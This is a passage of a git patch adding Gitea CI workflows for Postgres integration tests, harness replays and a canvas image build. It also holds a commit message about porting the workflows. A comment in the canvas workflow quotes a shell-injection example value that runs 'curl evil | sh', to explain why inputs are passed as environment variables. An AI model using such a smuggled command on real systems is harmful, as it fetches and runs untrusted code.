the original `services:` shape: +# + No host-port collision; N parallel runs share the bridge cleanly +# + `if: always()` cleanup runs even on test-step failure +# - One more step in the workflow (+~3 lines) +# - Requires `molecule-core-net` to exist on the operator host +# (it does; declared in docker-compose.yml + docker-compose.infra.yml) +# +# Class B Hongming-owned CICD red sweep, 2026-05-08. +# +# Cost: ~30s job (postgres pull from cache + go build + 4 tests). + +on: + push: + branches: [main, staging] + pull_request: + branches: [main, staging] +concurrency: + group: handlers-pg-integ-${{ github.event.pull_request.head.sha || github.sha }} + cancel-in-progress: false + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + detect-changes: + name: detect-changes + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + outputs: + handlers: ${{ steps.filter.outputs.handlers }} + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + fetch-depth: 0 + - id: filter + # Inline replacement for dorny/paths-filter — see e2e-api.yml. + run: | + BASE="${GITHUB_BASE_REF:-${{ github.event.before }}}" + if [ "${{ github.event_name }}" = "pull_request" ] && [ -n "${{ github.event.pull_request.base.sha }}" ]; then + BASE="${{ github.event.pull_request.base.sha }}" + fi + if [ -z "$BASE" ] || echo "$BASE" | grep -qE '^0+$'; then + echo "handlers=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + if ! git cat-file -e "$BASE" 2>/dev/null; then + git fetch --depth=1 origin "$BASE" 2>/dev/null || true + fi + if ! git cat-file -e "$BASE" 2>/dev/null; then + echo "handlers=true" >> "$GITHUB_OUTPUT" + exit 0 + fi + CHANGED=$(git diff --name-only "$BASE" HEAD) + if echo "$CHANGED" | grep -qE '^(workspace-server/internal/handlers/|workspace-server/internal/wsauth/|workspace-server/migrations/|\.gitea/workflows/handlers-postgres-integration\.yml$)'; then + echo "handlers=true" >> "$GITHUB_OUTPUT" + else + echo "handlers=false" >> "$GITHUB_OUTPUT" + fi + + # Single-job-with-per-step-if pattern: always runs to satisfy the + # required-check name on branch protection; real work gates on the + # paths filter. See ci.yml's Platform (Go) for the same shape. + integration: + name: Handlers Postgres Integration + needs: detect-changes + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + env: + # Unique name per run so concurrent jobs don't collide on the + # bridge network. ${RUN_ID}-${RUN_ATTEMPT} is unique even across + # workflow_dispatch reruns of the same run_id. + PG_NAME: pg-handlers-${{ github.run_id }}-${{ github.run_attempt }} + # Bridge network already exists on the operator host (declared + # in docker-compose.yml + docker-compose.infra.yml). + PG_NETWORK: molecule-core-net + defaults: + run: + working-directory: workspace-server + steps: + - if: needs.detect-changes.outputs.handlers != 'true' + working-directory: . + run: echo "No handlers/migrations changes — skipping; this job always runs to satisfy the required-check name." 
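+
+      # The workflow header above asserts that a host-net job container can
+      # reach a bridge-net container via its bridge IP (verified manually on
+      # the operator host). A sketch of what that manual check looks like
+      # (illustrative commands, not the exact ones run on 2026-05-08; the
+      # container name is made up):
+      #
+      #   docker run -d --name probe-pg --network molecule-core-net \
+      #     -e POSTGRES_PASSWORD=test postgres:15-alpine
+      #   IP=$(docker inspect probe-pg \
+      #     --format '{{(index .NetworkSettings.Networks "molecule-core-net").IPAddress}}')
+      #   docker run --rm --network host postgres:15-alpine pg_isready -h "$IP" -p 5432
+      #   # once postgres finishes booting: "<IP>:5432 - accepting connections"
+      #   docker rm -f probe-pg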
+ + - if: needs.detect-changes.outputs.handlers == 'true' + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + - if: needs.detect-changes.outputs.handlers == 'true' + uses: actions/setup-go@40f1582b2485089dde7abd97c1529aa768e1baff # v5 + with: + go-version: 'stable' + + - if: needs.detect-changes.outputs.handlers == 'true' + name: Start sibling Postgres on bridge network + working-directory: . + run: | + # Sanity: the bridge network must exist on the operator host. + # Hard-fail loud if it doesn't — easier to spot than a silent + # auto-create that diverges from the rest of the stack. + if ! docker network inspect "${PG_NETWORK}" >/dev/null 2>&1; then + echo "::error::Bridge network '${PG_NETWORK}' missing on operator host. Re-run docker-compose.infra.yml or check ops handbook." + exit 1 + fi + + # If a stale container with the same name exists (rerun on + # the same run_id), wipe it first. + docker rm -f "${PG_NAME}" >/dev/null 2>&1 || true + + docker run -d \ + --name "${PG_NAME}" \ + --network "${PG_NETWORK}" \ + --health-cmd "pg_isready -U postgres" \ + --health-interval 5s \ + --health-timeout 5s \ + --health-retries 10 \ + -e POSTGRES_PASSWORD=test \ + -e POSTGRES_DB=molecule \ + postgres:15-alpine >/dev/null + + # Read back the bridge IP. Always present immediately after + # `docker run -d` for bridge networks. + PG_HOST=$(docker inspect "${PG_NAME}" \ + --format "{{(index .NetworkSettings.Networks \"${PG_NETWORK}\").IPAddress}}") + if [ -z "${PG_HOST}" ]; then + echo "::error::Could not resolve PG_HOST for ${PG_NAME} on ${PG_NETWORK}" + docker logs "${PG_NAME}" || true + exit 1 + fi + echo "PG_HOST=${PG_HOST}" >> "$GITHUB_ENV" + echo "INTEGRATION_DB_URL=postgres://postgres:test@${PG_HOST}:5432/molecule?sslmode=disable" >> "$GITHUB_ENV" + echo "Started ${PG_NAME} at ${PG_HOST}:5432" + + - if: needs.detect-changes.outputs.handlers == 'true' + name: Apply migrations to Postgres service + env: + PGPASSWORD: test + run: | + # Wait for postgres to actually accept connections. Docker's + # health-cmd handles container-side readiness, but the wire + # to the bridge IP is best-tested with pg_isready directly. + for i in {1..15}; do + if pg_isready -h "${PG_HOST}" -p 5432 -U postgres -q; then break; fi + echo "waiting for postgres at ${PG_HOST}:5432..."; sleep 2 + done + + # Apply every migration in lexicographic order; a failing + # migration is SKIPPED (psql runs each file with ON_ERROR_STOP=1, + # so its first error aborts that file and the loop moves on) rather + # than blocking the suite. This handles the current schema state + # where a few historical migrations (e.g. 017_memories_fts_*) + # depend on tables that were later renamed/dropped and so + # cannot replay from scratch. The migrations that DO succeed + # land their tables, which is sufficient for the integration + # tests in handlers/. + # + # Why not maintain a curated allowlist: every new migration + # touching a handlers/-tested table would have to update this + # workflow. With apply-all-or-skip, a future migration that + # adds a column to delegations runs automatically (its base + # table 049_delegations.up.sql already succeeded above it in + # the order). Operators only need to revisit this if the + # migration chain becomes legitimately replayable end-to-end. + # + # Per-migration result is logged so a failed migration that + # SHOULD have been replayable surfaces in the CI log instead + # of silently failing. + # Apply both *.sql (legacy, lives next to its module) and + # *.up.sql (newer up/down convention) in a single + # lexicographically-sorted pass.
Excluding *.down.sql so the + # newest-naming-convention pairs don't undo themselves mid-run. + # Pre-#149-followup this loop only globbed *.up.sql, which + # silently skipped 001_workspaces.sql + 009_activity_logs.sql + # — fine while no integration test depended on those tables, + # not fine once a cross-table atomicity test came in. + set +e + for migration in $(ls migrations/*.sql 2>/dev/null | grep -v '\.down\.sql$' | sort); do + if psql -h "${PG_HOST}" -U postgres -d molecule -v ON_ERROR_STOP=1 \ + -f "$migration" >/dev/null 2>&1; then + echo "✓ $(basename "$migration")" + else + echo "⊘ $(basename "$migration") (skipped — see comment in workflow)" + fi + done + set -e + + # Sanity: the delegations + workspaces + activity_logs tables + # MUST exist for the integration tests to be meaningful. Hard- + # fail if any didn't land — that would be a real regression we + # want loud. + for tbl in delegations workspaces activity_logs pending_uploads; do + if ! psql -h "${PG_HOST}" -U postgres -d molecule -tA \ + -c "SELECT 1 FROM information_schema.tables WHERE table_name = '$tbl'" \ + | grep -q 1; then + echo "::error::$tbl table missing after migration replay — handler integration tests would be meaningless" + exit 1 + fi + echo "✓ $tbl table present" + done + + - if: needs.detect-changes.outputs.handlers == 'true' + name: Run integration tests + run: | + # INTEGRATION_DB_URL is exported by the start-postgres step; + # points at the per-run bridge IP, not 127.0.0.1, so concurrent + # workflow runs don't fight over a host-net 5432 port. + go test -tags=integration -timeout 5m -v ./internal/handlers/ -run "^TestIntegration_" + + - if: failure() && needs.detect-changes.outputs.handlers == 'true' + name: Diagnostic dump on failure + env: + PGPASSWORD: test + run: | + echo "::group::postgres container status" + docker ps -a --filter "name=${PG_NAME}" --format '{{.Status}} {{.Names}}' || true + docker logs "${PG_NAME}" 2>&1 | tail -50 || true + echo "::endgroup::" + echo "::group::delegations table state" + psql -h "${PG_HOST}" -U postgres -d molecule -c "SELECT * FROM delegations LIMIT 50;" || true + echo "::endgroup::" + + - if: always() && needs.detect-changes.outputs.handlers == 'true' + name: Stop sibling Postgres + working-directory: . + run: | + # always() so containers don't leak when migrations or tests + # fail. The cleanup is best-effort: if the container is + # already gone (e.g. concurrent rerun race), don't fail the job. + docker rm -f "${PG_NAME}" >/dev/null 2>&1 || true + echo "Cleaned up ${PG_NAME}" diff --git a/.gitea/workflows/harness-replays.yml b/.gitea/workflows/harness-replays.yml new file mode 100644 index 00000000..9186f673 --- /dev/null +++ b/.gitea/workflows/harness-replays.yml @@ -0,0 +1,262 @@ +name: Harness Replays + +# Ported from .github/workflows/harness-replays.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# + +# Boots tests/harness (production-shape compose topology with TenantGuard, +# /cp/* proxy, canvas proxy, real production Dockerfile.tenant) and runs +# every replay under tests/harness/replays/. 
Fails the PR if any replay +# fails. +# +# Why this exists: 2026-04-30 we shipped #2398 which added /buildinfo as +# a public route in router.go but forgot to add it to TenantGuard's +# allowlist. The handler-level test in buildinfo_test.go constructed a +# minimal gin engine without TenantGuard — green. The harness's +# buildinfo-stale-image.sh replay would have caught it (cf-proxy doesn't +# inject X-Molecule-Org-Id, so the curl path is identical to production's +# redeploy verifier), but no one ran the harness pre-merge. The bug +# shipped; the redeploy verifier silently soft-warned every tenant as +# "unreachable" for ~1 day before being noticed. +# +# This gate makes "did you actually run the harness?" a CI invariant +# instead of a memory-discipline thing. +# +# Trigger model — match e2e-api.yml: always FIRES on push/pull_request +# to staging+main, real work is gated per-step on detect-changes output. +# One job → one check run → branch-protection-clean (the SKIPPED-in-set +# trap from PR #2264 is documented in e2e-api.yml's e2e-api job comment). + +on: + push: + branches: [main, staging] + paths: + - 'workspace-server/**' + - 'canvas/**' + - 'tests/harness/**' + - '.gitea/workflows/harness-replays.yml' + pull_request: + branches: [main, staging] + paths: + - 'workspace-server/**' + - 'canvas/**' + - 'tests/harness/**' + - '.gitea/workflows/harness-replays.yml' +concurrency: + # Per-SHA grouping. Per-ref kept hitting the auto-promote-staging + # cancellation deadlock — see e2e-api.yml's concurrency block for + # the 2026-04-28 incident that codified this pattern. + group: harness-replays-${{ github.event.pull_request.head.sha || github.sha }} + cancel-in-progress: false + +env: + GITHUB_SERVER_URL: https://git.moleculesai.app + +jobs: + detect-changes: + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + outputs: + run: ${{ steps.decide.outputs.run }} + steps: + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + - id: decide + run: | + # workflow_dispatch: always run (manual trigger) + if [ "${{ github.event_name }}" = "workflow_dispatch" ]; then + echo "run=true" >> "$GITHUB_OUTPUT" + echo "debug=manual-trigger" >> "$GITHUB_OUTPUT" + exit 0 + fi + + # Determine the base commit to diff against. + # For pull_request: use base.sha (the merge-base with main/staging). + # For push: use github.event.before (the previous tip of the branch). + # Fallback for new branches (all-zeros SHA): run everything. + if [ "${{ github.event_name }}" = "pull_request" ] && \ + [ -n "${{ github.event.pull_request.base.sha }}" ]; then + BASE="${{ github.event.pull_request.base.sha }}" + elif [ -n "${{ github.event.before }}" ] && \ + ! echo "${{ github.event.before }}" | grep -qE '^0+$'; then + BASE="${{ github.event.before }}" + else + # New branch or github.event.before unavailable — run everything. + echo "run=true" >> "$GITHUB_OUTPUT" + echo "debug=new-branch-fallback" >> "$GITHUB_OUTPUT" + exit 0 + fi + + # GitHub Actions and Gitea Actions both expose github.sha for HEAD. + DIFF=$(git diff --name-only "$BASE" "${{ github.sha }}" 2>/dev/null) + echo "debug=diff-base=$BASE diff-files=$DIFF" >> "$GITHUB_OUTPUT" + + if echo "$DIFF" | grep -qE '^workspace-server/|^canvas/|^tests/harness/|^.gitea/workflows/harness-replays\.yml$'; then + echo "run=true" >> "$GITHUB_OUTPUT" + else + echo "run=false" >> "$GITHUB_OUTPUT" + fi + + # ONE job that always runs. 
Real work is gated per-step on + # detect-changes.outputs.run so an unrelated PR (e.g. doc-only + # change to molecule-controlplane wired here later) emits the + # required check without spending CI cycles. Single-job pattern + # matches e2e-api.yml — see that workflow's comment for why a + # job-level `if: false` would block branch protection via the + # SKIPPED-in-set bug. + harness-replays: + needs: detect-changes + name: Harness Replays + runs-on: ubuntu-latest + # Phase 3 (RFC #219 §1): surface broken workflows without blocking. + continue-on-error: true + timeout-minutes: 30 + steps: + - name: No-op pass (paths filter excluded this commit) + if: needs.detect-changes.outputs.run != 'true' + run: | + echo "No workspace-server / canvas / tests/harness / workflow changes — Harness Replays gate satisfied without running." + echo "::notice::Harness Replays no-op pass (paths filter excluded this commit)." + echo "::notice::Debug: ${{ needs.detect-changes.outputs.debug }}" + + - if: needs.detect-changes.outputs.run == 'true' + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + + # Log what files were detected so future failures include the diff. + - name: Log detected changes + if: needs.detect-changes.outputs.run == 'true' + run: | + echo "::notice::detect-changes debug: ${{ needs.detect-changes.outputs.debug }}" + + # github-app-auth sibling-checkout removed 2026-05-07 (#157): + # the plugin was dropped + Dockerfile.tenant no longer COPYs it. + + # Pre-clone manifest deps before docker compose builds the tenant + # image (Task #173 followup — same pattern as + # publish-workspace-server-image.yml's "Pre-clone manifest deps" + # step). + # + # Why pre-clone here too: tests/harness/compose.yml builds tenant-alpha + # and tenant-beta from workspace-server/Dockerfile.tenant with + # context=../.. (repo root). That Dockerfile expects + # .tenant-bundle-deps/{workspace-configs-templates,org-templates,plugins} + # to be present at build context root (post-#173 it COPYs from there + # instead of running an in-image clone — the in-image clone failed + # with "could not read Username for https://git.moleculesai.app" + # because there's no auth path inside the build sandbox). + # + # Without this step harness-replays fails before any replay runs, + # with `failed to calculate checksum of ref ... + # "/.tenant-bundle-deps/plugins": not found`. Caught by run #892 + # (main, 2026-05-07T20:28:53Z) and run #964 (staging — same + # symptom, different root cause: staging still has the in-image + # clone path, hits the auth error directly). + # + # 2026-05-08 sub-finding (#192): the clone step ALSO fails when + # any referenced workspace-template repo is private and the + # AUTO_SYNC_TOKEN bearer (devops-engineer persona) lacks read + # access. Root cause: 5 of 9 workspace-template repos + # (openclaw, codex, crewai, deepagents, gemini-cli) had been + # marked private with no team grant. Resolution: flipped them + # to public per `feedback_oss_first_repo_visibility_default` + # (the OSS surface should be public). Layer-3 (customer-private + + # marketplace third-party repos) tracked separately in + # internal#102. + # + # Token shape matches publish-workspace-server-image.yml: AUTO_SYNC_TOKEN + # is the devops-engineer persona PAT, NOT the founder PAT (per + # `feedback_per_agent_gitea_identity_default`). clone-manifest.sh + # embeds it as basic-auth for the duration of the clones and strips + # .git directories — the token never enters the resulting image. 
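+      # A minimal post-clone spot-check, sketched here as an illustration only
+      # (not part of this port). It exercises the two claims above, that no
+      # .git metadata and no embedded basic-auth remote survive into the build
+      # context; both commands should print nothing on a healthy clone:
+      #
+      #   find .tenant-bundle-deps -maxdepth 3 -type d -name .git
+      #   grep -RIl "@git.moleculesai.app" .tenant-bundle-deps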
+ - name: Pre-clone manifest deps + if: needs.detect-changes.outputs.run == 'true' + env: + MOLECULE_GITEA_TOKEN: ${{ secrets.AUTO_SYNC_TOKEN }} + run: | + set -euo pipefail + if [ -z "${MOLECULE_GITEA_TOKEN}" ]; then + echo "::error::AUTO_SYNC_TOKEN secret is empty — register the devops-engineer persona PAT in repo Actions secrets" + exit 1 + fi + mkdir -p .tenant-bundle-deps + bash scripts/clone-manifest.sh \ + manifest.json \ + .tenant-bundle-deps/workspace-configs-templates \ + .tenant-bundle-deps/org-templates \ + .tenant-bundle-deps/plugins + # Sanity-check counts so a silent partial clone fails fast + # instead of producing a half-empty image. + ws_count=$(find .tenant-bundle-deps/workspace-configs-templates -mindepth 1 -maxdepth 1 -type d | wc -l) + org_count=$(find .tenant-bundle-deps/org-templates -mindepth 1 -maxdepth 1 -type d | wc -l) + plugins_count=$(find .tenant-bundle-deps/plugins -mindepth 1 -maxdepth 1 -type d | wc -l) + echo "Cloned: ws=$ws_count org=$org_count plugins=$plugins_count" + + - name: Install Python deps for replays + # peer-discovery-404 (and future replays) eval Python against the + # running tenant — importing workspace/a2a_client.py pulls in + # httpx. tests/harness/requirements.txt holds just the HTTP-client + # surface to keep CI install fast (~3s) vs the full + # workspace/requirements.txt (~30s). + if: needs.detect-changes.outputs.run == 'true' + run: pip install -r tests/harness/requirements.txt + + - name: Run all replays against the harness + # run-all-replays.sh: boot via up.sh → seed via seed.sh → run + # every replays/*.sh → tear down via down.sh on EXIT (trap). + # Non-zero exit on any replay failure. + # + # KEEP_UP=1: without this, the script's trap-on-EXIT tears + # down containers immediately on failure, leaving the dump + # step below with nothing to dump (verified on PR #2410's + # first run — tenant became unhealthy, trap fired, dump + # step saw empty containers). Keeping them up lets the + # failure path collect tenant/cp-stub/cf-proxy logs. The + # always-run "Force teardown" step does the actual cleanup. + if: needs.detect-changes.outputs.run == 'true' + working-directory: tests/harness + env: + KEEP_UP: "1" + run: ./run-all-replays.sh + + - name: Dump compose logs on failure + # SECRETS_ENCRYPTION_KEY: docker compose validates the entire compose + # file even for read-only `logs` calls. up.sh generates a per-run key + # and exports it to its OWN shell — this step runs in a fresh shell + # that wouldn't see it, so without a placeholder the validate step + # errors before logs print (verified against PR #2492's first run: + # "required variable SECRETS_ENCRYPTION_KEY is missing a value"). + # A placeholder is fine — we're only reading log streams, not booting. 
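+      # Hedged aside, not wired into the workflow: the placeholder trick can be
+      # reproduced locally, since `docker compose config` runs the same variable
+      # validation that `logs` trips over without starting any container:
+      #
+      #   cd tests/harness
+      #   SECRETS_ENCRYPTION_KEY=dump-logs-placeholder docker compose -f compose.yml config --quiet
+      #
+      # Omitting the variable reproduces the "missing a value" error quoted
+      # above; any non-empty placeholder silences it.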
+ if: failure() && needs.detect-changes.outputs.run == 'true' + working-directory: tests/harness + env: + SECRETS_ENCRYPTION_KEY: dump-logs-placeholder + run: | + echo "=== docker compose ps ===" + docker compose -f compose.yml ps || true + echo "=== tenant-alpha logs ===" + docker compose -f compose.yml logs tenant-alpha || true + echo "=== tenant-beta logs ===" + docker compose -f compose.yml logs tenant-beta || true + echo "=== cp-stub logs ===" + docker compose -f compose.yml logs cp-stub || true + echo "=== cf-proxy logs ===" + docker compose -f compose.yml logs cf-proxy || true + echo "=== postgres-alpha logs (last 100) ===" + docker compose -f compose.yml logs --tail 100 postgres-alpha || true + echo "=== postgres-beta logs (last 100) ===" + docker compose -f compose.yml logs --tail 100 postgres-beta || true + + - name: Force teardown + # We pass KEEP_UP=1 to run-all-replays.sh so the dump step + # above sees real containers — that means we own teardown + # explicitly here. Always run. + if: always() && needs.detect-changes.outputs.run == 'true' + working-directory: tests/harness + run: ./down.sh || true From 7351d7766ffcabfdc8e250c16eca328804544475 Mon Sep 17 00:00:00 2001 From: dev-lead Date: Sun, 10 May 2026 21:26:21 -0700 Subject: [PATCH 5/7] =?UTF-8?q?ci:=20port=207=20deploy/publish/janitors=20?= =?UTF-8?q?to=20.gitea/workflows/=20(RFC=20internal#219=20=C2=A71,=20Categ?= =?UTF-8?q?ory=20C-3)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Sweep companion to PR#372 (ci.yml), PR#378 (Cat A), PR#379 (Cat B), PR#383 (Cat C-1), PR#386 (Cat C-2). Final port batch. Ports 7 deploy/publish/janitor workflows from .github/workflows/ to .gitea/workflows/. Each port applies the four-surface audit pattern; every job has `continue-on-error: true` (RFC §1 contract). Files ported: - publish-canvas-image.yml — canvas Docker image build/push. IMPORTANT OPEN QUESTION (flagged in file header): this workflow pushes to ghcr.io. GHCR was retired during the 2026-05-06 Gitea migration in favor of ECR. The pushed image may not be consumable post-migration. Review needs to decide: retarget to ECR (153263036946.dkr.ecr.us-east-2.amazonaws.com/molecule-ai/canvas) or retire entirely and route canvas deploys via operator-host. - redeploy-tenants-on-main.yml — prod tenant SSM redeploy on new workspace-server image. workflow_run trigger retained (same Gitea support caveat as canary-verify.yml — flagged in header). Simplified the job `if:` condition by dropping the `workflow_dispatch` branch. - redeploy-tenants-on-staging.yml — staging mirror of above. Same workflow_run caveat + same `if:` simplification. - sweep-aws-secrets.yml — hourly AWS Secrets Manager tenant-secret janitor. Dropped workflow_dispatch.inputs (dry_run/max_delete_pct/ grace_hours); cron triggers run with the script defaults instead. if-step gates conditional on github.event_name=='workflow_dispatch' are dead-code post-port but harmless. - sweep-cf-orphans.yml — hourly CF DNS janitor. Same shape. - sweep-cf-tunnels.yml — hourly CF Tunnels janitor. Same shape. - sweep-stale-e2e-orgs.yml — every-15-min staging tenant cleanup. Same shape. Open questions for review: 1. workflow_run on redeploy-tenants-on-* — same caveat as canary-verify.yml (Cat C-2). If Gitea ignores the event, the follow-up triage PR replaces with push-with-paths-filter on .gitea/workflows/publish-workspace-server-image.yml. 2. publish-canvas-image GHCR target — decide retarget-to-ECR vs retire-entirely with reviewer. 3. 
workflow_dispatch.inputs replacements — the four janitor sweeps lost their operator-facing dry_run/cap-override knobs. If a manual override is needed today, edit the cron envs in the file directly. Follow-up could add a "manual override commit" pattern that the cron reads from a checked-in JSON. DO NOT MERGE without orchestrator-dispatched Five-Axis review + @hongmingwang chat-go. Cross-links: - RFC: molecule-ai/internal#219 - Companions: PR#372, PR#378, PR#379, PR#383, PR#386 Co-Authored-By: Claude Opus 4.7 (1M context) --- .gitea/workflows/publish-canvas-image.yml | 135 +++++++ .gitea/workflows/redeploy-tenants-on-main.yml | 375 ++++++++++++++++++ .../workflows/redeploy-tenants-on-staging.yml | 356 +++++++++++++++++ .gitea/workflows/sweep-aws-secrets.yml | 129 ++++++ .gitea/workflows/sweep-cf-orphans.yml | 151 +++++++ .gitea/workflows/sweep-cf-tunnels.yml | 128 ++++++ .gitea/workflows/sweep-stale-e2e-orgs.yml | 243 ++++++++++++ 7 files changed, 1517 insertions(+) create mode 100644 .gitea/workflows/publish-canvas-image.yml create mode 100644 .gitea/workflows/redeploy-tenants-on-main.yml create mode 100644 .gitea/workflows/redeploy-tenants-on-staging.yml create mode 100644 .gitea/workflows/sweep-aws-secrets.yml create mode 100644 .gitea/workflows/sweep-cf-orphans.yml create mode 100644 .gitea/workflows/sweep-cf-tunnels.yml create mode 100644 .gitea/workflows/sweep-stale-e2e-orgs.yml diff --git a/.gitea/workflows/publish-canvas-image.yml b/.gitea/workflows/publish-canvas-image.yml new file mode 100644 index 00000000..f9d61214 --- /dev/null +++ b/.gitea/workflows/publish-canvas-image.yml @@ -0,0 +1,135 @@ +name: publish-canvas-image + +# Ported from .github/workflows/publish-canvas-image.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# - **Open question for review**: this workflow pushes the canvas +# image to `ghcr.io`. GHCR was retired during the 2026-05-06 +# Gitea migration in favor of ECR (per canary-verify.yml header +# notes). The image may not be consumable post-migration. Two +# options for follow-up: (a) retarget to +# `153263036946.dkr.ecr.us-east-2.amazonaws.com/molecule-ai/canvas`, +# or (b) retire this workflow entirely and route canvas deploys +# via the operator-host build path. tier:low + continue-on-error +# means failed pushes do not block PRs. +# + +# Builds and pushes the canvas Docker image to GHCR whenever a commit lands +# on main that touches canvas code. Previously canvas changes were visible in +# CI (npm run build passed) but the live container was never updated — +# operators had to manually run `docker compose build canvas` each time. +# +# Mirror of publish-platform-image.yml, adapted for the Next.js canvas layer. +# See that workflow for inline notes on macOS Keychain isolation and QEMU. + +on: + push: + branches: [main] + paths: + # Only rebuild when canvas source changes — saves GHA minutes on + # platform-only / docs-only / MCP-only merges. + - 'canvas/**' + - '.gitea/workflows/publish-canvas-image.yml' + # Manual trigger: use after a non-canvas merge that still needs a fresh + # image (e.g. 
a Dockerfile change lives outside the canvas/ tree).
+permissions:
+  contents: read
+  packages: write  # required to push to ghcr.io/${{ github.repository_owner }}/*
+
+env:
+  IMAGE_NAME: ghcr.io/molecule-ai/canvas
+  GITHUB_SERVER_URL: https://git.moleculesai.app
+
+jobs:
+  build-and-push:
+    name: Build & push canvas image
+    runs-on: ubuntu-latest
+    # Phase 3 (RFC #219 §1): surface broken workflows without blocking.
+    continue-on-error: true
+    steps:
+      - name: Checkout
+        uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+
+      - name: Log in to GHCR
+        uses: docker/login-action@c94ce9fb468520275223c153574b00df6fe4bcc9 # v3
+        with:
+          registry: ghcr.io
+          username: ${{ github.actor }}
+          password: ${{ secrets.GITHUB_TOKEN }}
+
+      - name: Set up Docker Buildx
+        uses: docker/setup-buildx-action@4d04d5d9486b7bd6fa91e7baf45bbb4f8b9deedd # v4.0.0
+
+      # Health check: verify Docker daemon is accessible before attempting any
+      # build steps. This fails loudly at step 1 when the runner's docker.sock
+      # is inaccessible rather than silently continuing to the build step
+      # where docker build fails deep in ECR auth with a cryptic error.
+      - name: Verify Docker daemon access
+        run: |
+          set -euo pipefail
+          echo "::group::Docker daemon health check"
+          docker info 2>&1 | head -5 || {
+            echo "::error::Docker daemon is not accessible at /var/run/docker.sock"
+            echo "::error::Check: (1) daemon running, (2) runner user in docker group, (3) sock perms 660+"
+            exit 1
+          }
+          echo "Docker daemon OK"
+          echo "::endgroup::"
+
+      - name: Compute tags
+        id: tags
+        shell: bash
+        run: |
+          echo "sha=${GITHUB_SHA::7}" >> "$GITHUB_OUTPUT"
+
+      - name: Resolve build args
+        id: build_args
+        # Priority: workflow_dispatch input > repo secret > hardcoded default.
+        # NEXT_PUBLIC_* env vars are baked into the JS bundle at build time by
+        # Next.js — they cannot be changed at runtime without a full rebuild.
+        # For local docker-compose deployments the defaults (localhost:8080)
+        # work as-is; production deployments should set CANVAS_PLATFORM_URL
+        # and CANVAS_WS_URL as repository secrets.
+        #
+        # Inputs are passed via env vars (not direct ${{ }} interpolation) to
+        # prevent shell injection from workflow_dispatch string inputs.
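+        # Hedged illustration of the hazard being avoided (the input names are
+        # the dropped workflow_dispatch ones, shown only for contrast). Direct
+        # interpolation splices the raw input into the script source before
+        # bash runs, so a crafted value becomes code:
+        #
+        #   PLATFORM_URL="${{ github.event.inputs.platform_url }}"   # a value like '"; curl evil | sh; : "' would execute
+        #
+        # Routing it through INPUT_PLATFORM_URL delivers the value as data in
+        # the step environment, and the ${VAR:-default} expansion below never
+        # re-parses it as shell.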
+ shell: bash + env: + INPUT_PLATFORM_URL: ${{ github.event.inputs.platform_url }} + SECRET_PLATFORM_URL: ${{ secrets.CANVAS_PLATFORM_URL }} + INPUT_WS_URL: ${{ github.event.inputs.ws_url }} + SECRET_WS_URL: ${{ secrets.CANVAS_WS_URL }} + run: | + PLATFORM_URL="${INPUT_PLATFORM_URL:-${SECRET_PLATFORM_URL:-http://localhost:8080}}" + WS_URL="${INPUT_WS_URL:-${SECRET_WS_URL:-ws://localhost:8080/ws}}" + + echo "platform_url=${PLATFORM_URL}" >> "$GITHUB_OUTPUT" + echo "ws_url=${WS_URL}" >> "$GITHUB_OUTPUT" + + - name: Build & push canvas image to GHCR + uses: docker/build-push-action@bcafcacb16a39f128d818304e6c9c0c18556b85f # v7.1.0 + with: + context: ./canvas + file: ./canvas/Dockerfile + platforms: linux/amd64 + push: true + build-args: | + NEXT_PUBLIC_PLATFORM_URL=${{ steps.build_args.outputs.platform_url }} + NEXT_PUBLIC_WS_URL=${{ steps.build_args.outputs.ws_url }} + tags: | + ${{ env.IMAGE_NAME }}:latest + ${{ env.IMAGE_NAME }}:sha-${{ steps.tags.outputs.sha }} + cache-from: type=gha + cache-to: type=gha,mode=max + labels: | + org.opencontainers.image.source=https://github.com/${{ github.repository }} + org.opencontainers.image.revision=${{ github.sha }} + org.opencontainers.image.description=Molecule AI canvas (Next.js 15 + React Flow) diff --git a/.gitea/workflows/redeploy-tenants-on-main.yml b/.gitea/workflows/redeploy-tenants-on-main.yml new file mode 100644 index 00000000..be7cc68d --- /dev/null +++ b/.gitea/workflows/redeploy-tenants-on-main.yml @@ -0,0 +1,375 @@ +name: redeploy-tenants-on-main + +# Ported from .github/workflows/redeploy-tenants-on-main.yml on 2026-05-11 per RFC +# internal#219 §1 sweep. Differences from the GitHub version: +# - Dropped `workflow_dispatch.inputs` (Gitea 1.22.6 parser rejects them +# per feedback_gitea_workflow_dispatch_inputs_unsupported). +# - Dropped `merge_group:` (no Gitea merge queue). +# - Dropped `environment:` blocks (Gitea has no environments). +# - Workflow-level env.GITHUB_SERVER_URL pinned per +# feedback_act_runner_github_server_url. +# - `continue-on-error: true` on each job (RFC §1 contract). +# - **Gitea workflow_run trigger limitation**: Gitea 1.22.6's support +# for the `workflow_run` event is partial. If this 